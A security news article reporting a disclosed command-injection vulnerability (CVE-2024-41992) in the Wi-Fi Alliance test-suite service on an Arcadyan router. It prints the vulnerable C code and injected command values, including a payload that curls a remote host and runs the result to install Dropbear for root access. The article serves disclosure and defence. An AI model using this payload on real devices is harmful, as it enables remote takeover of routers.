A critical zero-day vulnerability has been identified in the Arcadyan FMIMG51AX000J model and potentially other devices affiliated with the WiFi Alliance. This flaw allows remote attackers to execute arbitrary code.

An independent security researcher working with SSD Secure Disclosure identified the vulnerability, tracked as CVE-2024-41992.

Despite reaching out to the WiFi Alliance via CERT VINCE in April 2024 (Case VU#123336), there has been no clear timeline for a fix.

Consequently, the researchers have decided to publicly disclose the issue to alert users, even though a solution is not yet available.

“We reached out to WiFi Alliance via CERT VINCE (Case VU#123336) in April 2024, several months later, and with no clear schedule for the release of a fix (by the vendor or by WiFi Alliance) we have decided to release this advisory to notify the public of this vulnerability without being able to provide a fix” SSD Secure Disclosure team said.

Technical Details

While conducting a network scan with Nmap on a router, researchers identified that ports 8000 and 8080 were open.

Although Nmap couldn’t identify the service running on these ports, probing them revealed a response indicating the presence of the “DUT-Wi-FiTestSuite” service.

##############################NEXT PROBE##############################
Probe TCP wfa_dut q|\x01\x00\x00\x00|
rarity 1
ports 8000,8080

match wfa_dut m|^\x01\x00\x08\x02\x04\x00\x00\x00\x00\x00\x00\x00DUT-Wi-FiTestSuite-|

This service is a test utility developed by the Wi-Fi Alliance for testing routers, and it’s not typically found on production devices.

The service listens for packets in a specific format known as TLV (Type-Length-Value). The packet structure consists of a 2-byte type, a 2-byte length, and a value ranging from 0 to 640 bytes.

The data is sent in big-endian format but processed in little-endian format on the device. The service has a list of functions that can be called using these packets.

For example, to get the version of the Wi-Fi Test Suite, you send a packet with the type value of ‘1’ and a length of ‘0’.

You explored whether this service could be used to execute commands, and indeed it can, albeit with limitations.

The function wfaDecodeTLV decodes the incoming packets, extracting the type, length, and value. Some functions, like wfaStaGetIpConfig, use the parameters from these packets to execute system commands. For instance, it formats a command using the first 16 bytes of the parameters and executes it.

You found that injecting commands is possible, but with significant constraints. You can inject a short command by crafting a packet with a specific type and length.

For example, using the value $(sleep 5), you can execute a sleep command. However, the length of the command is limited to 13 characters due to the 16-byte parameter space.

While the service allows for command execution, the exploitability is limited by the short length of commands that can be injected.

This makes it challenging to perform more complex exploits, but it does highlight a potential security risk in environments where this service is exposed.

Exploitability

While character constraints limited initial attempts at command injection, the researchers found that using the wfaTGSendPing function allowed for more extensive exploitation.

//In wfa_tg.h
//#define IPV6_ADDRESS_STRING_LEN    40
typedef struct _tg_ping_start
{
    char dipaddr[IPV6_ADDRESS_STRING_LEN];  /* destination/remote ip address */
    int  frameSize;
    float  frameRate;
    int  duration;
    int  type;
    int  qos;
    int  iptype;
    int  dscp;
} tgPingStart_t;

By leveraging the IPv6 address field, which allows for longer input, attackers can execute complex commands and gain control over the device.

if (staPing->iptype == 2)
{
  if ( tos>0)
    sprintf(cmdStr, "echo streamid=%i > /tmp/spout_%d.txt;wfaping6.sh %s %s -i %f -c %i -Q %d -s %i -q >> /tmp/spout_%d.txt 2>/dev/null",
                    streamid,streamid,bflag, staPing->dipaddr, *interval, totalpkts, tos,  staPing->frameSize,streamid);
  else
    sprintf(cmdStr, "echo streamid=%i > /tmp/spout_%d.txt;wfaping6.sh %s %s -i %f -c %i -s %i -q >> /tmp/spout_%d.txt 2>/dev/null",
                    streamid,streamid,bflag, staPing->dipaddr, *interval, totalpkts, staPing->frameSize,streamid);
  sret = system(cmdStr);

Researchers have broader exploitation possibilities by leveraging the binaries already in the targeted system.

By sending a specific packet, we can execute remote commands. The packet structure is as follows: Type (2 = 0x02), Length (33 = 0x21), and Value, which is a command: '$(sh -c "$(curl 192.168.1.247:4)")'.

In parallel, we run a Python server on our machine that serves several components: a bash script that downloads and configures Dropbear, the Dropbear binary, and the dropbearkey binary.

Additionally, the server is set to print POST requests on the console for debugging purposes. This setup allows us to gain full root access to the system; Researchers published a complete exploit here.

This vulnerability underscores the importance of robust security measures in IoT and network devices. Users of the affected models are advised to monitor for firmware updates and apply patches as soon as they become available. In the meantime, securing network access and monitoring unusual activity is recommended.